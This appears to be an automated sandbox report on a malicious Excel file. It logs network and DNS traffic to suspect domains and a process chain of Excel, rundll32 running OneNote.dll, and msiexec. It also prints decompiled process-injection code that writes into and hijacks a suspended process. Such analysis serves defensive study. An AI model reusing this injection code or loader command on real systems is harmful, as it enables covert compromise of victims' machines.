Jan 22, 2021 16:45:15.060798883 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:15.060939074 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:15.061000109 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 16:45:15.074943066 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 16:45:15.114924908 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:17.454021931 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:17.454040051 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:17.454117060 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:17.454246998 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 16:45:17.454273939 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 16:45:17.459897041 CET	49167	443	192.168.2.22	104.21.86.32
Jan 22, 2021 16:45:17.500233889 CET	443	49167	104.21.86.32	192.168.2.22
Jan 22, 2021 16:45:17.564652920 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.610411882 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.610516071 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.611681938 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.657289028 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.661427021 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.661459923 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.661555052 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.677939892 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.723628044 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.723870993 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:17.724015951 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.750860929 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:17.796737909 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:18.207654953 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:18.207684994 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:45:18.207833052 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:18.210541010 CET	49168	443	192.168.2.22	172.67.152.74
Jan 22, 2021 16:45:18.256175995 CET	443	49168	172.67.152.74	192.168.2.22
Jan 22, 2021 16:46:40.288741112 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:46:40.329406977 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:46:40.329505920 CET	49165	443	192.168.2.22	104.21.23.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 16:44:40.345122099 CET	52197	53	192.168.2.22	8.8.8.8
Jan 22, 2021 16:44:40.404329062 CET	53	52197	8.8.8.8	192.168.2.22
Jan 22, 2021 16:45:13.453588963 CET	53099	53	192.168.2.22	8.8.8.8
Jan 22, 2021 16:45:13.512970924 CET	53	53099	8.8.8.8	192.168.2.22
Jan 22, 2021 16:45:13.513684988 CET	53099	53	192.168.2.22	8.8.8.8
Jan 22, 2021 16:45:13.561489105 CET	53	53099	8.8.8.8	192.168.2.22
Jan 22, 2021 16:45:14.861565113 CET	52838	53	192.168.2.22	8.8.8.8
Jan 22, 2021 16:45:14.918212891 CET	53	52838	8.8.8.8	192.168.2.22
Jan 22, 2021 16:45:17.505768061 CET	61200	53	192.168.2.22	8.8.8.8
Jan 22, 2021 16:45:17.561975002 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 22, 2021 16:44:40.345122099 CET	192.168.2.22	8.8.8.8	0x1168	Standard query (0)	fortnitehecks.com	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.453588963 CET	192.168.2.22	8.8.8.8	0x7892	Standard query (0)	groceryasian.com	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.513684988 CET	192.168.2.22	8.8.8.8	0x7892	Standard query (0)	groceryasian.com	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:14.861565113 CET	192.168.2.22	8.8.8.8	0x182f	Standard query (0)	forteanhub.com	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:17.505768061 CET	192.168.2.22	8.8.8.8	0xf291	Standard query (0)	conssapratigdevi.tk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 22, 2021 16:44:40.404329062 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	fortnitehecks.com	104.21.23.220	A (IP address)	IN (0x0001)
Jan 22, 2021 16:44:40.404329062 CET	8.8.8.8	192.168.2.22	0x1168	No error (0)	fortnitehecks.com	172.67.213.245	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.512970924 CET	8.8.8.8	192.168.2.22	0x7892	No error (0)	groceryasian.com	172.67.209.71	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.512970924 CET	8.8.8.8	192.168.2.22	0x7892	No error (0)	groceryasian.com	104.21.85.189	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.561489105 CET	8.8.8.8	192.168.2.22	0x7892	No error (0)	groceryasian.com	172.67.209.71	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:13.561489105 CET	8.8.8.8	192.168.2.22	0x7892	No error (0)	groceryasian.com	104.21.85.189	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:14.918212891 CET	8.8.8.8	192.168.2.22	0x182f	No error (0)	forteanhub.com	104.21.86.32	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:14.918212891 CET	8.8.8.8	192.168.2.22	0x182f	No error (0)	forteanhub.com	172.67.214.102	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:17.561975002 CET	8.8.8.8	192.168.2.22	0xf291	No error (0)	conssapratigdevi.tk	172.67.152.74	A (IP address)	IN (0x0001)
Jan 22, 2021 16:45:17.561975002 CET	8.8.8.8	192.168.2.22	0xf291	No error (0)	conssapratigdevi.tk	104.21.32.134	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 22, 2021 16:44:40.516279936 CET	104.21.23.220	443	192.168.2.22	49165	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jan 17 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jan 17 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:44:40.516279936 CET	104.21.23.220	443	192.168.2.22	49165	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:13.738972902 CET	172.67.209.71	443	192.168.2.22	49166	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Dec 02 01:00:00 CET 2020 Mon Jan 27 13:48:08 CET 2020	Thu Dec 02 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:13.738972902 CET	172.67.209.71	443	192.168.2.22	49166	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:15.009085894 CET	104.21.86.32	443	192.168.2.22	49167	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jan 17 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jan 17 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:15.009085894 CET	104.21.86.32	443	192.168.2.22	49167	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:17.661459923 CET	172.67.152.74	443	192.168.2.22	49168	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Thu Sep 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Fri Sep 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 22, 2021 16:45:17.661459923 CET	172.67.152.74	443	192.168.2.22	49168	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1620 Parent PID: 584

General

Start time:	16:44:38
Start date:	22/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f1a0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2392 Parent PID: 1620

General

Start time:	16:44:44
Start date:	22/01/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Imagebase:	0xff1f0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2344 Parent PID: 2392

General

Start time:	16:44:44
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Imagebase:	0x790000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 2504 Parent PID: 2344

General

Start time:	16:45:12
Start date:	22/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0xd40000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2344 Parent PID: 2392 rundll32.exeCOMMON

Executed Functions

Function 6E85AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E6E85AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E6E8545B0(_t76, _t159, _t177, __eflags); // executed
				E6E856C20(_t159, _t177, __eflags);
				E6E856530(_t159, _t177, _t226);
				E6E858660(_t159, _t177, _t226);
				E6E8578D0(_t159, _t177, _t226);
				E6E8566E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E6E85D670() == 0) {
					return 0xffffffff;
				}
				E6E86B180();
				_t228 =  *0x6e8737b0;
				if( *0x6e8737b0 == 0) {
					L19:
					E6E85BF50(_t243, 0, E6E859D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E6E85BF50(_t228, 0, E6E859D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x6e8737b0,  &_v1416, 0x104);
				_t91 =  *0x6e8737b0; // 0x6e850000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E6E868F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E6E85D0A0( &_v179, 0x6e870b1b,  &_v179);
				_t178 =  &_v896;
				E6E85C560(_t178, _t94, 0xffffffff);
				E6E85BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E6E85A820(_v32);
				E6E85BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x6e872ca8 = _t100;
				_v24 = _t100;
				E6E86FA60(_t178, _t231,  &_v1416);
				E6E8690E0(_t178);
				E6E86FB20(_t178);
				_t104 = E6E859D80(_v32, _t152); // executed
				_t188 = _t104;
				E6E864660(_t104, _v32);
				E6E859550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E6E8676C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E6E85BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E6E85BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E6E857DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E6E857DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E6E85E930( &_v125, E6E86D7E0( &_v28, _t177, 0x6e870962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E6E8522E0(_t236, E6E85CA4E, _t182);
							_t119 = E6E859D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0x246fa7e1 - _t182 + _t153 - _t184 + _t119;
							E6E85BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E6E868F20(_t155, 0x2cc);
								_v896 = 0x10001;
								_t123 = E6E85BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E6E85BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E6E85BF50(_t239, 0, E6E859D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E6E85BF50(_t241, 0, 0xd1a4de8);
									_t128 = E6E859D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E6E85BF50(__eflags, 0, E6E859D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E6E85BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E6E853750(0,  !_t139, 0x9b6b004f);
						_v40 = E6E852DC0(0, E6E859D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E6E8520A0(0, E6E852DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E6E859D50(0xff1f00e3);
						E6E852DC0(0, _v52, _t157 >> 0x18);
						_t150 = E6E8522E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x6e85ae40
0x6e85ae4c
0x6e85ae51
0x6e85ae56
0x6e85ae5b
0x6e85ae60
0x6e85ae65
0x6e85ae6a
0x6e85ae76
0x6e85b2de
0x6e85b2de
0x6e85ae7c
0x6e85ae81
0x6e85ae88
0x6e85b2b4
0x6e85b2c4
0x6e85b2ce
0x6e85b2ce
0x6e85ae9e
0x6e85aea3
0x6e85aea6
0x6e85aeb8
0x6e85aeba
0x6e85aebf
0x6e85aec1
0x6e85aec4
0x00000000
0x00000000
0x6e85aeca
0x6e85aed3
0x6e85aee1
0x6e85aef1
0x6e85aef9
0x6e85af03
0x6e85af12
0x6e85af17
0x6e85af2e
0x6e85af30
0x6e85af33
0x00000000
0x00000000
0x6e85af44
0x6e85af4d
0x6e85af52
0x6e85af62
0x6e85af64
0x6e85af66
0x00000000
0x00000000
0x6e85af6c
0x6e85af74
0x6e85af77
0x6e85af7d
0x6e85af87
0x6e85af91
0x6e85af99
0x6e85af9d
0x6e85afa9
0x6e85afae
0x6e85afb1
0x6e85afb8
0x6e85afba
0x6e85afbd
0x6e85b08d
0x6e85b08d
0x6e85b09b
0x6e85b0a0
0x6e85b0af
0x6e85b0b1
0x6e85b0b4
0x6e85b0ba
0x6e85b0c3
0x6e85b0c8
0x6e85b0d9
0x6e85b0db
0x6e85b0dd
0x6e85b0e7
0x6e85b0ef
0x6e85b0f2
0x6e85b0f8
0x6e85b0fb
0x6e85b10b
0x6e85b114
0x6e85b11a
0x6e85b11e
0x6e85b13e
0x6e85b146
0x6e85b149
0x6e85b153
0x6e85b160
0x6e85b176
0x6e85b17d
0x6e85b187
0x6e85b18c
0x6e85b19d
0x6e85b19f
0x6e85b1a2
0x6e85b1a8
0x6e85b1b0
0x6e85b1b7
0x6e85b1bf
0x6e85b1d0
0x6e85b1de
0x6e85b1e7
0x6e85b1ec
0x6e85b1fb
0x6e85b200
0x6e85b206
0x6e85b209
0x6e85b20e
0x6e85b214
0x6e85b226
0x6e85b22b
0x6e85b232
0x6e85b239
0x6e85b239
0x6e85b239
0x6e85b239
0x6e85b23c
0x6e85b250
0x6e85b257
0x6e85b25c
0x6e85b26b
0x6e85b270
0x6e85b272
0x6e85b274
0x6e85b2a7
0x6e85b2ac
0x6e85b2af
0x6e85b276
0x6e85b27d
0x6e85b282
0x6e85b285
0x6e85b287
0x6e85b289
0x6e85b28b
0x6e85b28e
0x6e85b290
0x6e85b292
0x6e85b292
0x6e85b2b2
0x6e85b2b2
0x6e85b270
0x6e85b200
0x6e85b1a2
0x6e85b0dd
0x00000000
0x6e85afc3
0x6e85afc3
0x6e85afc6
0x6e85afc8
0x6e85afcb
0x6e85afd0
0x6e85afd0
0x6e85afd3
0x6e85afdd
0x6e85afe0
0x6e85afe7
0x6e85affb
0x6e85b027
0x6e85b02b
0x6e85b044
0x6e85b04c
0x6e85b066
0x6e85b072
0x6e85b077
0x6e85b07a
0x6e85b07d
0x6e85b07f
0x6e85b082
0x6e85b085
0x6e85b085
0x00000000
0x6e85afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 6E85AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6E85B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6E85B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 6E85B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 6E85B1FB
SetThreadContext.KERNEL32(?,?), ref: 6E85B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 6E85B26B
ResumeThread.KERNELBASE(?), ref: 6E85B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6E85AF2E

Part of subcall function 6E85BF50: LoadLibraryA.KERNEL32(?), ref: 6E85C1A1

ExitProcess.KERNEL32(00000000), ref: 6E85B2CE

Strings

D, xrefs: 6E85AEE1

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: ed4d2cdd80d8db6338fefb681cfb4a88ef84d4efd64a731eae127f68b7e21c7d
Instruction ID: 34cdb24a6fa5e80f7f5c6d825aac22df56c8ae194153dddabe2ad8e45b334dfb
Opcode Fuzzy Hash: ed4d2cdd80d8db6338fefb681cfb4a88ef84d4efd64a731eae127f68b7e21c7d
Instruction Fuzzy Hash: 2DC1FBB1D402186BEF519BE89C42FEE7678AF54709F040C24F918B73C5EF6159248BB2

Uniqueness

Uniqueness Score: -1.00%

Function 6E8947A1, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000006B6,00003000,00000040,000006B6,6E8941F8), ref: 6E89485E
VirtualAlloc.KERNEL32(00000000,000005CD,00003000,00000040,6E89425A), ref: 6E894895
VirtualAlloc.KERNEL32(00000000,00022303,00003000,00000040), ref: 6E8948F5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E89492B
VirtualProtect.KERNEL32(6E850000,00000000,00000004,6E894780), ref: 6E894A30
VirtualProtect.KERNEL32(6E850000,00001000,00000004,6E894780), ref: 6E894A57
VirtualProtect.KERNEL32(00000000,?,00000002,6E894780), ref: 6E894B24
VirtualProtect.KERNEL32(00000000,?,00000002,6E894780,?), ref: 6E894B7A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E894B96

Memory Dump Source

Source File: 00000004.00000002.2156782626.000000006E894000.00000040.00020000.sdmp, Offset: 6E894000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 57d054768ecb4a813ecf50a7dcaf17930a2ef301419193303bab764567466bed
Instruction ID: 8436a0cce380864996925f5df21e3fde7db65f8c00394e8325c195715a296262
Opcode Fuzzy Hash: 57d054768ecb4a813ecf50a7dcaf17930a2ef301419193303bab764567466bed
Instruction Fuzzy Hash: 35D18B72A006009FDB21DF58C8C0B5277B6FFA8724B090594ED199F3DAE771A811EB74

Uniqueness

Uniqueness Score: -1.00%

Function 6E86DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E86DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E6E857200(0x6e8705f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x6e86da3f
0x6e86da47
0x6e86da4c
0x6e86da53
0x6e86da53
0x6e86da5b
0x6e86da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-6E871D33,?,6E8591EB,-6E871D33,?,6E8577A1,00000001), ref: 6E86DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-6E871D33,?,6E8591EB,-6E871D33,?,6E8577A1,00000001,?,-6E871D33,?,6E856A74), ref: 6E86DA4C
CloseHandle.KERNEL32(00000000), ref: 6E86DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-6E871D33,?,6E8591EB,-6E871D33,?,6E8577A1,00000001,?,-6E871D33,?,6E856A74), ref: 6E86DA5B

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 729277589c5f780f653a54d5dd81dfd067b50b3c56ab7ae5004519f9f633d3d7
Instruction ID: 005d6cc84efb5acb31e2c51a4ee8b7485593a3cb6c979dce2e979571424c20e5
Opcode Fuzzy Hash: 729277589c5f780f653a54d5dd81dfd067b50b3c56ab7ae5004519f9f633d3d7
